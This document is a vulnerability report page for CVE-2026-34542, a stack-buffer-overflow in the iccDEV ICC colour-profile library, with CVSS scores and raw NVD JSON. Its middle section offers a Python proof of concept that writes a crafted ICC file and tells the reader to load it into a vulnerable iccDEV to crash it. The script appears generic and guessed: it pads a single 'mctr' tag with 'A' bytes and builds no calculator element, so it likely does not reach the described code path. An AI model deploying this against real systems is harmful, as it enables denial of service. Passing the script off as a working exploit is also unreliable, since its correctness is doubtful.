Security Vulnerability Report
CVE-2026-34542 CVSS 6.2 MEDIUM

CVE-2026-34542

Published: 2026-03-31 22:16:22
Last Modified: 2026-04-20 14:31:14

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a stack-buffer-overflow (SBO) in CIccCalculatorFunc::Apply() when processed via iccApplyNamedCmm. Under AddressSanitizer, the failure is reported as a 4-byte write stack-buffer-overflow in IccProfLib/IccMpeCalc.cpp:3873, reachable through the MPE calculator / curve set initialization path. This issue has been patched in version 2.3.1.6.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-34542
# Proof of concept to trigger stack-buffer-overflow in iccDEV
import struct

def generate_malformed_icc(filename):
    """
    Generates a malformed ICC profile that attempts to trigger the overflow
    in CIccCalculatorFunc::Apply().
    """
    # Minimal ICC Header
    size = 0
    cmm_type = b'acsp'
    version = struct.pack('>I', 0x02000000)
    device_class = b'scnr '
    color_space = b'RGB '
    pcs = b'XYZ '
    date = b'\x00' * 12
    magic = b'acsp'
    platform = b'APPL'
    flags = struct.pack('>I', 0)
    manufacturer = struct.pack('>I', 0)
    model = struct.pack('>I', 0)
    attributes = struct.pack('>Q', 0)
    intent = struct.pack('>I', 0)
    illuminant = struct.pack('>III', 0, 0, 0)  # Simplified
    creator = struct.pack('>I', 0)

    header = (struct.pack('>I', 0) +  # Placeholder for size
              cmm_type + version + device_class + color_space + pcs +
              date + magic + platform + flags + manufacturer + model +
              attributes + intent + illuminant + creator + b'\x00' * 44)

    # Tag table entry pointing to malicious data
    # Tag signature: 'mctr' (Multi Process Elements or similar)
    tag_sig = struct.pack('>I', 0x6D637472)
    tag_offset = struct.pack('>I', len(header) + 4)  # Point after tag count
    tag_size = struct.pack('>I', 0x1000)  # Large size to cause overflow
    tag_count = struct.pack('>I', 1)

    # Malicious payload intended to overflow the stack
    payload = b'A' * 0x1000

    # Calculate total size
    total_size = len(header) + 4 + 12 + len(payload)
    header = struct.pack('>I', total_size) + header[4:]

    with open(filename, 'wb') as f:
        f.write(header)
        f.write(tag_count)
        f.write(tag_sig + tag_offset + tag_size)
        f.write(payload)

if __name__ == "__main__":
    generate_malformed_icc('cve-2026-34542.icc')
    print("[+] Malformed ICC profile generated: cve-2026-34542.icc")
    print("[+] Load this file with a vulnerable version of iccDEV to trigger the crash.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34542", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:21.920", "lastModified": "2026-04-20T14:31:14.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger a stack-buffer-overflow (SBO) in CIccCalculatorFunc::Apply() when processed via iccApplyNamedCmm. Under AddressSanitizer, the failure is reported as a 4-byte write stack-buffer-overflow in IccProfLib/IccMpeCalc.cpp:3873, reachable through the MPE calculator / curve set initialization path. This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, un perfil ICC manipulado puede desencadenar un desbordamiento de búfer de pila (SBO) en CIccCalculatorFunc::Apply() cuando se procesa a través de iccApplyNamedCmm. Bajo AddressSanitizer, el fallo se informa como un desbordamiento de búfer de pila de escritura de 4 bytes en IccProfLib/IccMpeCalc.cpp:3873, accesible a través de la ruta de inicialización del calculador MPE / conjunto de curvas. Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/678", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/694", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-6749-6859-wf96", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}